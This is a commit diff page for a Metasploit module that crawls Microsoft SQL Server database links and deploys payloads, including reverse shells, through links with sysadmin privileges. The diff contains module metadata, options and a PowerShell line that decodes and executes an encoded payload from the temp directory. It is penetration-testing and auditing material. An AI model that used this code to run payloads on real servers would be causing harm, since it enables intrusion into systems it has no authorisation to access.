Finalizing module
parent
53a2fda608
commit
677b9718da
|
@ -1,3 +1,11 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/mssql_commands'
|
||||
|
||||
|
@ -10,32 +18,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server - Database Link Crawler',
|
||||
'Description' => %q{This module can be used to crawl MS SQL Server
|
||||
database links and deploy metasploit payloads through links configured
|
||||
with sysadmin privileges using a valid SQL Server Login. If you are
|
||||
attempting to obtain multiple reverse shells using this module we
|
||||
recommend setting the "DisablePayloadHandler" advanced option to "true",
|
||||
and setting up a multi/handler to run in the background as a job to
|
||||
support multiple incoming shells. If you are interested in deploying
|
||||
payloads to spefic servers this module also supports that functionality
|
||||
via the "DEPLOYLIST" option. Currently, the module is capable of
|
||||
delivering payloads to both 32bit and 64bit Windows systems via
|
||||
powershell memory injection methods based on Matthew Graeber's work.
|
||||
As a result, the target server must have powershell installed.
|
||||
By default, all of the crawl information is saved to a CSV formatted
|
||||
log file and MSF loot so that the tool can also be used for auditing
|
||||
without deploying payloads.},
|
||||
'Name' => 'Microsoft SQL Server Database Link Crawling Command Execution',
|
||||
'Description' => %q{
|
||||
This module can be used to crawl MS SQL Server database links and deploy
|
||||
Metasploit payloads through links configured with sysadmin privileges using a
|
||||
valid SQL Server Login.
|
||||
|
||||
If you are attempting to obtain multiple reverse shells using this module we
|
||||
recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
|
||||
up a multi/handler to run in the background as a job to support multiple incoming
|
||||
shells.
|
||||
|
||||
If you are interested in deploying payloads to spefic servers this module also
|
||||
supports that functionality via the "DEPLOYLIST" option.
|
||||
|
||||
Currently, the module is capable of delivering payloads to both 32bit and 64bit
|
||||
Windows systems via powershell memory injection methods based on Matthew Graeber's
|
||||
work. As a result, the target server must have powershell installed. By default,
|
||||
all of the crawl information is saved to a CSV formatted log file and MSF loot so
|
||||
that the tool can also be used for auditing without deploying payloads.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Antti Rantasaari <antti.rantasaari [at] netspi.com>',
|
||||
'Scott Sutherland "nullbind" <scott.sutherland [at] netspi.com>'
|
||||
'Antti Rantasaari <antti.rantasaari[at]netspi.com>',
|
||||
'Scott Sutherland "nullbind" <scott.sutherland[at]netspi.com>'
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [[ 'URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
|
||||
['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
|
||||
['URL','http://www.exploit-monday.com/2011_10_16_archive.html']],
|
||||
['URL','http://www.exploit-monday.com/2011_10_16_archive.html']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'DisclosureDate' => 'Jan 1 2000',
|
||||
'Targets' =>
|
||||
|
@ -47,9 +62,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('VERBOSE', [false, 'Set how verbose the output should be', 'false']),
|
||||
OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']),
|
||||
OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']),
|
||||
OptString.new('PASSWORD', [true, 'The password for the specified username'])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -511,7 +531,7 @@ $winFunc::CreateThread(0,0,$x,0,0,0)"
|
|||
# Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
|
||||
# If running on 64bit system, 32bit powershell called from syswow64
|
||||
powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\
|
||||
'*64*'){$psbits=\"C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
|
||||
'*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
|
||||
-noexit -noprofile -encodedCommand $dacode\"};iex $psbits"
|
||||
powershell_uni = Rex::Text.to_unicode(powershell_cmd)
|
||||
powershell_64 = Rex::Text.encode_base64(powershell_uni)
|
||||
|
|
Loading…
Reference in New Issue